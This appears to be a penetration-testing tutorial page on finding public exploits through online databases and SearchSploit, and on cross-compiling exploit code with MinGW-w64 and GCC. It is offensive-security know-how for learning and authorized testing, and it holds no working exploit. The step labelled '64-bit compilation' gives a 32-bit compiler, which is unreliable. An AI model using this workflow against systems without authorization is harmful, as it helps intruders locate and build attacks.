# Searching For Exploits

## Searching For Publicly Available Exploits

After identifying a potential vulnerability within a target or a service running on a target, the next logical step is to search for exploit code that can be used to exploit the vulnerability.

* **Exploit Code:** Exploit code can easily be found online. However, it is important to note that downloading and running exploit code against a target can be quite dangerous. It is recommended to analyze the exploit code closely to ensure that it works as intended.
* **Legitimate Exploit Databases:** There are a handful of legitimate and vetted exploit databases that you should use when searching for exploits online:
  * [**Exploit-db**](https://www.exploit-db.com/)
  * [**Rapid7**](https://www.rapid7.com/db/)
  * [**Packet Storm**](https://packetstormsecurity.com/files/tags/exploit/) **(Cyber News + Exploits + More)**

## Searching For Exploits With SearchSploit

* **Offline Exploits:** In some cases, access to online exploits may not be available, requiring the use of locally available exploit sources.
* **Exploit-db Database:** The entire Exploit-db database of exploits is pre-packaged with Kali Linux, providing access to all exploits locally.
* **SearchSploit Tool:** The Exploit-db offline database of exploits can be accessed and queried using a tool called SearchSploit.
* **Storage Location:** All exploits are stored in `/usr/share/exploitdb`.

## Fixing Exploits

Before executing any exploit sourced from external or internal origins, it is imperative to conduct a comprehensive review of both the code and accompanying documentation. Understanding the exact functionality and prerequisites of the exploit is crucial for successful server exploitation.

Always ensure a thorough grasp of the exploit's operations and potential implications prior to proceeding. Unauthorized or careless use of exploits can result in significant consequences.

## Cross-Compiling Exploits

* **Executable Code Development:** Exploit code may often be developed in languages like C, C++, or C#. Consequently, it will need to be compiled into a Portable Executable (PE) or binary format.
* **Cross-Compilation Definition:** Cross-compiling refers to the process of compiling code intended for one platform on a different platform.
* **Penetration Testing Skills:** As a penetration tester, it's essential to possess the necessary skills for compiling exploit code written in C and its variants.

## Compiling Exploit Code Using MinGW-w64 and GCC

1. **64-bit Compilation:**

   ```bash
   i686-w64-mingw32-gcc <exploit_code> -o <output_name>
   ```
2. **32-bit Compilation (with Winsock library):**

   ```bash
   i686-w64-mingw32-gcc <exploit_code> -o <output_name> -lws2_32
   ```
3. **Compiling ELF Binary (for Linux/Unix):**

   ```bash
   gcc -pthread <exploit_code> -o <output_name> -lcrypt
   ```

You can also access pre-compiled exploits on the [Exploit Database GitHub repository](https://gitlab.com/exploit-database/exploitdb-bin-sploits).

***

***

***

**`Hacker's Mantra:`**` ``I look like a geek hacker, but I don’t know anything about computers. - Justin Long`